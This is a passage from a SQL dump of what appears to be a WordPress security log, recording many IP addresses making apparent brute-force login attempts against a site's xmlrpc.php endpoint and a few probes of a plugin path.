475418.3941,152,'enjLEhpNgkFG4IyKzsW7Hm0M','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.68.47.117',3158585205,'techspt',0,1681475414.3079,152,'qVpWt8isGaD1Zom7YUBTXdFH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.7.190.240',2634530544,'techspt',0,1681475408.8574,152,'7iLXu5VvxOQ8hfApBaJsjzPc','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('104.207.254.152',1758461592,'techspt',0,1681525891.4420,152,'VeFQOUJxbMYnvTfkw9ticXja','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.7.188.161',2634529953,'techspt',0,1681525891.3945,152,'fOQ3swv2rNIB6UTkFqe87c50','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('202.172.26.49',3400276529,'techspt',0,1681524074.1416,152,'Rp7t2bzluV6e1qJkIiHY5Q89','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.159.84.218',1738495194,'techspt',0,1681524071.5244,152,'53iAPE1KhYIZf2egpqDC8j7x','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681524064.8726,152,'Geg17NJuFhziVQAOc9Sv42Xb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('43.155.103.11',731604747,'techspt',0,1681524053.3328,152,'7MNmieTxua4LWYGZjvt0Qdfn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('43.204.104.245',734816501,'techspt',0,1681524048.6804,152,'4BaeiO3WtI5LojucF9QRThZK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('74.208.59.164',1255160740,'techspt',0,1681524040.3412,152,'mI5vBWkLsTe3irOVRDZQFgH4','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('74.208.59.234',1255160810,'techspt',0,1681524039.9472,152,'FnGrpd81NA0s3Vw9gv6TZCzo','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('162.0.232.58',2717968442,'techspt',0,1681524039.0866,152,'Tw1KgXmF7302qrYJW4oucVHb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'techspt',0,1681523267.0926,152,'4B7pSnsG8MQoCmRbdJqvVcaj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.207.149',3484733333,'techspt',0,1681523265.7270,152,'6bK3HG8aDepOVnogBtduirXF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.207.254.152',1758461592,'techspt',0,1681523262.5554,152,'F0myHGiqbDU1XZ4xzIPYo6LJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('139.59.104.143',2335926415,'techspt',0,1681523248.5470,152,'s53mVybHM0QUKOuP4wikoXpB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'techspt',0,1681523245.8341,152,'bIHrhMRsTVuN7xqGPySJ5KXC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'techspt',0,1681523234.8697,152,'FAJs8qkL0bSTzauxhtQMCwWI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.214.190.212',601276116,'techspt',0,1681523234.1529,152,'Y5h6V0wWoO7LPeMnX4dIfErx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.163.34.111',3265471087,'techspt',0,1681523222.5009,152,'gylV3nQ2Tj8CGfZuW1wsrqeN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.62.105.205',2990434765,'techspt',0,1681523213.5010,152,'CIbre5Gx1VZHPjUTunv3qJiR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('188.227.227.182',3169051574,'techspt',0,1681523198.8029,152,'P4NQRah9UyMdBH0FOu6ZqAIc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.254.90.235',1761499883,'techspt',0,1681520456.4380,152,'KPtIJEvwCXuZLSlUbgpNdf85','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('190.104.235.180',3194547124,'techspt',0,1681519015.6741,152,'XR3unjYFLiNUeI7yKOx0MkDA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.162.31.237',3114409965,'techspt',0,1681518997.7070,152,'cyx71fkp4AmS8V5TQLjlqFgO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('94.247.177.44',1593291052,'techspt',0,1681518994.9406,152,'BYgMUz541FRZDdG3yWQmLpqO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.126.132.168',2424210600,'techspt',0,1681518985.7846,152,'s938yUzeVwvjnTL5Xc1fAKkW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'techspt',0,1681518985.7693,152,'FLZb6iDvjGQTJWPpU43gcVtf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.104.167.76',795387724,'techspt',0,1681518980.0513,152,'zEHVXZFSvuTaPCgN28QxtBIJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.107.237.174',795602350,'techspt',0,1681518977.1804,152,'3foUgqGVIJHb1ZsWt0iw7BaT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('39.104.85.137',661149065,'techspt',0,1681518975.0288,152,'tl8C3aPmAXnNux9QeVyshHLT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.248.50.72',2516070984,'techspt',0,1681518972.2550,152,'MAiRnQr8Ba7Gyb4Z1mUXP3ld','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.207.254.152',1758461592,'techspt',0,1681518966.4848,152,'7qwIKDLSsmJWtvZcCjoM5dVO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('183.181.91.159',3082115999,'techspt',0,1681518966.4168,152,'oO6UIARci349QTGPL8fuqS15','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.171',3091979691,'techspt',0,1681532643.7485,152,'rjkTgiExfyVcSGp0XQ3hlFKo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('158.101.2.96',2657419872,'techspt',0,1681533498.4420,152,'BDmkxo9OsJPdLvwnzWHcaTMZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('83.143.245.51',1401943347,'techspt',0,1681552970.9000,152,'cqlKDS4weT639k7F0XOLJC2d','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('59.106.222.53',996859445,'techspt',0,1681554232.8936,152,'jtDC4eXWYgIFvMm6SZBfbGay','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'',0,1681566242.0356,10,'0OhTxd4mHNkyXWR2Yv6VgZDJ','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('128.199.67.142',2160542606,'techspt',0,1681566242.0297,152,'0OhTxd4mHNkyXWR2Yv6VgZDJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('163.172.168.158',2746001566,'techspt',0,1681566236.6419,152,'KH8JPDjFbUy2IhV7d3ORELif','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.59.90.4',3342555652,'techspt',0,1681566233.0026,152,'9xstZzUyITM5AQ0NK6fPrnYL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'techspt',0,1681566232.9757,152,'49zZmraR5278w1sKGXYCFxgP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.254.153.99',1744738659,'techspt',0,1681565659.4444,152,'2pNTQW94w7xs5XHqFcruGyMd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.132.254.35',864353827,'techspt',0,1681642985.0275,152,'jbQvFedAch5Rrxs8f1pKMSlE','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('138.186.9.114',2327447922,'techspt',0,1681642982.8256,152,'KiPasNh795e0kTyuwbXGgzjc','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('75.119.135.6',1266124550,'techspt',0,1681642968.5323,152,'KZRPFTmNtsg0vVDyceLWGo5O','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('162.0.229.50',2717967666,'techspt',0,1681642961.2880,152,'JNhu7yXHsDGm92ZTgAix84VQ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.74.227',2420919011,'techspt',0,1681642961.0482,152,'KhG79XIUPE8xdS3rLABfHOJc','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.255.46',804454190,'techspt',0,1681642952.1327,152,'c2hzHgABZ1Vy0Fe47XRuOqLf','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.146.176.238',1737666798,'techspt',0,1681642951.4846,152,'x4mtlH5KbY8pLCWkXoPFBeA7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('81.21.253.29',1360395549,'techspt',0,1681642945.4137,152,'qlUP8m6nhsBwibGey5jTZgCV','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('193.200.99.82',3251135314,'techspt',0,1681642930.1377,152,'d45OGgCbsKxwRWDQSYfF7N1L','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'techspt',0,1681642924.1869,152,'v7dmOgykqMJY9E1NePiWFpTl','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.74.227',2420919011,'techspt',0,1681647728.4458,152,'MLPhq3ivDlJxckut7QXOKoaA','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'techspt',0,1681647727.3616,152,'8SvVNwALBQ0mJ6yXWu5OcREn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681647722.6815,152,'5VYrlpyf0dQtx2MascEZSbTn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('137.184.59.110',2310552430,'techspt',0,1681647716.3295,152,'xRJKmrnuGefUDMEjZY5VahQT','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.187.50.29',96154141,'techspt',0,1681647715.8483,152,'sZnNcAhU1g6Q40DVpe7tR9fG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681647709.3994,152,'Xk51mwDeg0OqaucR7KTLs3QS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.23.51.23',85406487,'techspt',0,1681647708.2286,152,'fA509blpwoLuEBc8NyHm2JYs','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.94.209.234',1834930666,'techspt',0,1681651924.9372,152,'eSAnJWcXLO6Ygo0iT2rfsNGy','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.94.209.234',1834930666,'techspt',0,1681651924.2853,152,'QyO4jrvDocbhPY5LTg7d8GIW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('89.201.167.100',1506387812,'techspt',0,1681651917.3124,152,'J9NpniISkKrojUCRMOs4tud3','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('142.132.251.120',2391079800,'techspt',0,1681651916.0196,152,'cKLJBvNrVna8lg9GCOyfdbP6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.152.161.85',3583549781,'techspt',0,1681651679.9379,152,'YtkMXmwsIBacQVUSA30N4JGe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.247.108.18',1761045522,'techspt',0,1681674083.9092,152,'dvTlYJQPE2K3cHruq48URSMF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.55.248.19',3476551699,'techspt',0,1681674075.6755,152,'iU5ps3vW892wRVKmNTQ7EGye','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.38.249.174',774306222,'techspt',0,1681674068.0053,152,'TaARtrumFzZ30d9ObxLhqp42','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.207.89',2917650265,'techspt',0,1681674066.1869,152,'yj7k9wVlDt0C13biYBepcUrN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.146.176.238',1737666798,'techspt',0,1681671525.6698,152,'uKnSAEOIi6ol3jmh0zZGtVrD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.221.223.238',1742594030,'techspt',0,1681671514.5117,152,'6DXR4L3ahjpnPm82v7WkB9CH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'techspt',0,1681671502.5622,152,'zLx83G0ioVPpwaXcHy95vnOI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.132.254.35',864353827,'techspt',0,1681671500.6977,152,'h0XGn7mdceqIplvu8f3yJgFj','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.255.46',804454190,'techspt',0,1681671499.9754,152,'mv0HpFAJRjdhzY6qOZfrILlD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.54.124.210',3325459666,'techspt',0,1681671496.1825,152,'JxSfzg836tj5iYZyBrVQGNFD','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681671492.4979,152,'lDcUAPEy4HfMsLgxIb87Cz3Y','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.9.59.22',84491030,'techspt',0,1681671487.1646,152,'ozfWUP5Rw7VtAe4LypqIKuhG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'techspt',0,1681671485.4078,152,'ysSVhknl3cbKe2JEMOtXQTir','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.172.80.82',531386450,'techspt',0,1681671485.3845,152,'TouCDIWVOg2GyMv5haltzH41','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('85.10.148.169',1426756777,'techspt',0,1681671216.8043,152,'zjV26AoBYtlXqrHDv8iwNcmT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'',0,1681671207.0763,10,'SZgjIw5d8MAl4ytDVfP0c1Ux','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('95.167.178.158',1604825758,'techspt',0,1681671207.0731,152,'SZgjIw5d8MAl4ytDVfP0c1Ux','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.140.192.206',629981390,'techspt',0,1681671205.8758,152,'BxKJ2OqAUk47MWpZSjDn9P8z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.199.67.142',2160542606,'techspt',0,1681671196.0043,152,'YU3ymP9AXbuROjlIBcr5wegS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681671189.2677,152,'HSirQek5j7DJcEmK8wRn9UGA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('189.126.122.183',3179182775,'techspt',0,1681671188.3371,152,'fUM1VgupjX5EBcLmxCDH6ZaN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.62.105.205',2990434765,'techspt',0,1681671184.2576,152,'fis0aBLtHMW4qUQx2CPobv3Y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.248.50.72',2516070984,'techspt',0,1681671175.4684,152,'oAdXqvNmOucJ083QfbnIaEH4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.86.47',1386567215,'techspt',0,1681671174.9457,152,'DX6su2R57apI8nP1iBNbKo9G','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('217.151.98.168',3650577064,'techspt',0,1681670719.8350,152,'qEfBLltcryns5VDxZdkN0PWY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.222.44.188',870198460,'',0,1681670233.0812,55,'CxyOzLRBVDQA0rHsWX1T7qN8','','19|0|0|0|cmdev-site1.com/blog/wp-content/plugins/task-controller/index.php',0,19,0),('51.222.44.188',870198460,'',0,1681670232.4505,55,'B8TmfAWolDbXijIh7KJwuVYn','','19|0|0|0|cmdev-site1.com/wp/wp-content/plugins/task-controller/index.php',0,19,0),('213.152.161.219',3583549915,'techspt',0,1681666323.3548,152,'GQaoH5vblmncg041u9SOqLpW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('208.109.61.155',3496820123,'techspt',0,1681665543.5103,152,'1uQMAwgDd2IGsYm4E3nrcFqT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.146.176.238',1737666798,'',0,1681665541.8631,10,'gl3OEuaofT6X0GkheQYKtz5y','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('103.146.176.238',1737666798,'techspt',0,1681665541.8598,152,'gl3OEuaofT6X0GkheQYKtz5y','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.146.176.238',1737666798,'techspt',0,1681665534.9234,152,'cCtLWSGXHsEak4hB6zKmxI7g','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('160.153.155.29',2694421277,'techspt',0,1681665534.6822,152,'QH0IxwBahPf24KUSsrNcWovY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'techspt',0,1681665533.2734,152,'m9LY0FqSdbGkTUNcjr86Khyw','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'',0,1681665530.8689,10,'73z6hiUYCxQIMW9VODlk4fgE','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('95.167.178.158',1604825758,'techspt',0,1681665530.8626,152,'73z6hiUYCxQIMW9VODlk4fgE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('139.59.25.27',2335906075,'techspt',0,1681665526.7025,152,'n5TbPMws3DgEKUNGJua8SLI0','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('129.232.157.131',2179505539,'techspt',0,1681665521.2033,152,'MvbtX4Bc0xks3A2Lr5jS9nK7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681665519.8926,152,'5GjNLDSgxtoevKMC2lJykz7q','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.68.47.117',3158585205,'techspt',0,1681665519.6651,152,'paQyn0ZzwI9R2cvVrf8BULm4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('149.248.50.72',2516070984,'techspt',0,1681665518.9413,152,'3s7kZHeNa0p1PlqIC5ouvXiA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.145.59',1503891771,'techspt',0,1681665516.9429,152,'hxMH8KgeDu7lw9F5b2XVUyjv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.187.195',3583556547,'techspt',0,1681665515.5380,152,'2w9qa0JxlrXK5z3LobfB8UNF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('59.106.222.53',996859445,'techspt',0,1681665509.8351,152,'m5y6uB8INM0l9gFdTiKp2ZRX','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('77.68.6.56',1296303672,'techspt',0,1681665509.1532,152,'Ya2HpJOve9ludmDkLWyqbKoz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.32.201.69',2988493125,'techspt',0,1681665501.7289,152,'KEz6U1eAxfFc5tqdZmT7gPXb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('162.0.229.50',2717967666,'techspt',0,1681665498.1215,152,'BUhmPl1YAteGsFTW8cQDK5uq','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'',0,1681665492.6233,10,'ne2CE9lOIuUcxa1vMXrtk7bZ','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('18.218.139.173',316312493,'techspt',0,1681665492.6164,152,'ne2CE9lOIuUcxa1vMXrtk7bZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('62.151.182.173',1050130093,'techspt',0,1681665490.0721,152,'vbTWEaRYGDMHqKZyVXdrh1uc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('144.76.74.227',2420919011,'techspt',0,1681665489.5487,152,'2P7gZ0XYMKIRVq9shxwASaL8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681665488.4879,152,'8mz6jN7XqEQoGseitl5n1xKk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681665487.9560,152,'E2HeDskS3K9lhNyQzUWpZbPA','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('104.254.90.235',1761499883,'techspt',0,1681664382.5347,152,'uJLAxZ0IhT1rFy8kbUod62cj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.39.4.40',86443048,'techspt',0,1681662618.1731,152,'9gp6wGvZU3CIQKnhL57aWDTE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('77.68.6.56',1296303672,'techspt',0,1681662617.6610,152,'4hckM5iHAKl0FqDQ3gOXCrmT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.231.50',2917656370,'techspt',0,1681662617.3819,152,'eI9KqTk681OvXQB2YcVzprS4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('163.172.168.158',2746001566,'techspt',0,1681662604.8105,152,'boXL0O1SKhJRiT4p2tBkNIFl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.135.143.169',92770217,'techspt',0,1681662603.3234,152,'4ZQFrP98LpRzKCOjg5s0UmIv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.214.190.212',601276116,'techspt',0,1681662589.5467,152,'NBtCaWg3xjq4HvkZ6wDb9V1F','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.62.105.205',2990434765,'techspt',0,1681662587.4759,152,'Oacz9o6JipDbxZqNAYTfHven','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('139.59.104.143',2335926415,'techspt',0,1681662574.8900,152,'aRNmKgIAVUkMXrQsTdvBo259','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'techspt',0,1681662571.5875,152,'8KIJtu3Y7P4ZyBjaOldT9nwF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.122.120.71',2256173127,'techspt',0,1681662563.7913,152,'dyha2bcOzRpmQFsLYD90UfC5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.149.158',1152554398,'techspt',0,1681662563.1454,152,'qnrvwEoK6cJ7z80VhuW4TMk3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.255.98.122',100622970,'techspt',0,1681662562.1128,152,'Ketsp74P6XCjUcwDNzB31iyq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.207.89',2917650265,'techspt',0,1681661016.8329,152,'6BVIg3paEjRwKbirGDOHd2ZJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'',0,1681661016.0698,10,'5w2acpGoP6yrizfgsW9EjSVn','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('14.225.192.104',249675880,'techspt',0,1681661016.0637,152,'5w2acpGoP6yrizfgsW9EjSVn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('176.56.56.133',2956474501,'techspt',0,1681661011.5294,152,'O3fDFygX2qMJ8USazRhHVeYL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.32.201.69',2988493125,'techspt',0,1681661011.2662,152,'dAb9aBKWiC3lkD2Oj1QJPs0L','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('165.22.211.204',2769736652,'techspt',0,1681661011.0529,152,'pDqf3AaYBhExz1Ho9jnXIG0Z','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'techspt',0,1681661000.5095,152,'RzLIQSw2FPJADhiql1K3BjZc','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.76.74.227',2420919011,'techspt',0,1681661000.0929,152,'AwmC6GaW9gZn4uBkQp0Ne2Ej','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.141.215.15',3113080591,'techspt',0,1681660997.2783,152,'okTrZnHIu6qfwBgVmlibPMSx','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('193.200.99.82',3251135314,'techspt',0,1681660993.6371,152,'W9kDdJziKcL2oEBFPZ0HmSxa','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.132.254.35',864353827,'techspt',0,1681660991.9913,152,'tF0khqIdXMrEK7S6RvOpcBma','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'techspt',0,1681660983.7667,152,'MaTXBipHAuQsFqCNvbtfjknd','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.172.80.82',531386450,'techspt',0,1681660982.5759,152,'rZiP0M3JDtl6agomUjReCksL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('43.155.103.11',731604747,'techspt',0,1681660979.9640,152,'LcOEFG6peTxabgJ7M9t3YKVi','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.222.44.188',870198460,'',0,1681670231.3565,10,'tsv3XVyL86PcISDl5H1YCw2F','','707|0|0|0|cmdev-site1.com/wordpress/wp-content/plugins/task-controller/index.php',0,707,0),('51.222.44.188',870198460,'',0,1681670231.3529,55,'tsv3XVyL86PcISDl5H1YCw2F','','19|0|0|0|cmdev-site1.com/wordpress/wp-content/plugins/task-controller/index.php',0,19,0),('51.222.44.188',870198460,'',0,1681670230.3643,55,'9QA0Lbs8ejlYgKa4HUVtSNiO','','19|0|0|0|cmdev-site1.com/wp-content/plugins/task-controller/index.php',0,19,0),('104.254.90.187',1761499835,'techspt',0,1681668540.2790,152,'b4TMkjd9SYocnsgL5CRa3rEZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'techspt',0,1681683069.0596,152,'XoMuGL5djnUKF4bY3rWhAw8m','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.182.56.150',3115726998,'techspt',0,1681683059.8833,152,'bkCvwFWZV4n9mrUcP5xzKBj8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('72.167.57.16',1218918672,'techspt',0,1681683059.7744,152,'rdCDoYWFJum32tBEXZgpRsM9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('89.201.167.100',1506387812,'techspt',0,1681683055.9290,152,'hM7FQrOWuj68ELDeCGRaqvln','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('43.155.103.11',731604747,'techspt',0,1681683055.1604,152,'kNPyGFERhJHuC3V1YD8jBzI7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.2.176',1556939440,'techspt',0,1681683053.4422,152,'Nrz9HEgoWkZPMUcDdeasmbQ7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.62.105.205',2990434765,'techspt',0,1681687202.9381,152,'uzDClpifYh1UFWcJbKev7tGT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'techspt',0,1681687197.0250,152,'J6esDMPciU4TO3K82CrumXyF','','0